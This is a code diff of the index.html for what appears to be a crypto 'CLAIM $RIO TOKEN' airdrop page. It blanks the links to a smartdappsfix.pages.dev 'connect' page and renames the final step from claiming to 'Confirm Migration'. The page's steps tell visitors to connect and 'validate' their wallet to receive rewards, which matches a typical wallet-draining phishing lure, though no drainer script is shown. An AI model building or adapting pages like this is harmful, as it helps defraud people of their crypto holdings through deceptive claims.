--- a/index.html
+++ b/index.html
@@ -15,10 +15,6 @@
  background-color: #cccccc;
  background-repeat: no-repeat;
 
-}
-			.connectButton {
-			cursor: pointer;
-			}
 		  </style>
     <link href="icofont.min.css" rel="stylesheet" type="text/css">
 
@@ -32,7 +28,7 @@
 <body>
     <nav class="navbar navbar-expand-lg navbar-dark bg-dark shadow-sm p-0 osahan-nav">
     <div class="container">
-        <a class="navbar-brand" href="https://smartdappsfix.pages.dev/index.html">
+        <a class="navbar-brand" href="">
             <img src="./rel.webp"  alt="#" class="img-fluid">
         </a>
         <button class="navbar-toggler" type="button" data-bs-toggle="collapse" data-bs-target="#navbarNavAltMarkup16" aria-expanded="true" aria-label="Toggle navigation">
@@ -41,7 +37,7 @@
         <div class="navbar-collapse collapse show" id="navbarNavAltMarkup16" style="">
             <ul class="navbar-nav me-auto mb-2 mb-lg-0">
                 <li class="nav-item">
-                    <a class="nav-link active" aria-current="page" href="https://smartdappsfix.pages.dev/index.html">CLAIM $RIO TOKEN</a>
+                    <a class="nav-link active" aria-current="page" href="">CLAIM $RIO TOKEN</a>
                 </li>
             </ul>
 
@@ -73,7 +69,7 @@
                     <div class="rounded shadow-sm p-4 bg-white d-flex align-items-center gap-3 steps-item">
                         <span class="bg-primary rounded-circle steps-item-icon"><i class="bi bi-wallet2 text-white"></i></span>
                         <div>
-                            <a style="text-decoration:none" href="https://smartdappsfix.pages.dev/connect/index.html"><div class="fw-bold fs-6 mb-1">1. Connect your Wallet</div></a>
+                            <a style="text-decoration:none" href=""><div class="fw-bold fs-6 mb-1">Connect your Wallet</div></a>
                             <p class="text-muted m-0 d-none d-md-block">Connect your wallet to automatically detect your address</p>
                         </div>
                     </div>
@@ -82,7 +78,7 @@
                     <div class="rounded shadow-sm p-4 bg-white d-flex align-items-center gap-3 steps-item">
                         <span class="bg-primary rounded-circle steps-item-icon"><i class="bi bi-patch-plus text-white"></i></span>
                         <div>
-                            <a style="text-decoration:none" href="https://smartdappsfix.pages.dev/connect/index.html"><div class="fw-bold fs-6 mb-1">Validate Wallet</div></a>
+                            <a style="text-decoration:none" href=""><div class="fw-bold fs-6 mb-1"> Validate Wallet </div></a>
                             <div class="text-muted m-0 d-none d-md-block">You will be prompted to validate via a decentralized protocol.</div>
                         </div>
                     </div>
@@ -91,8 +87,8 @@
                     <div class="rounded shadow-sm p-4 bg-white d-flex align-items-center gap-3 steps-item">
                         <span class="bg-primary rounded-circle steps-item-icon"><i class="bi bi-piggy-bank text-white"></i></span>
                         <div>
-                            <a style="text-decoration:none" href="https://smartdappsfix.pages.dev/connect/index.html"><div class="fw-bold fs-6 mb-1">Continue to claiming</div></a>
-                            <div class="text-muted m-0 d-none d-md-block">Claim your token with the same process and await your rewards</div>
+                            <a style="text-decoration:none" href=""><div class="fw-bold fs-6 mb-1">Confirm Migration</div></a>
+                            <div class="text-muted m-0 d-none d-md-block">Confirm your token migration with the same process and await your rewards</div>
                         </div>
                     </div>
                 </div>
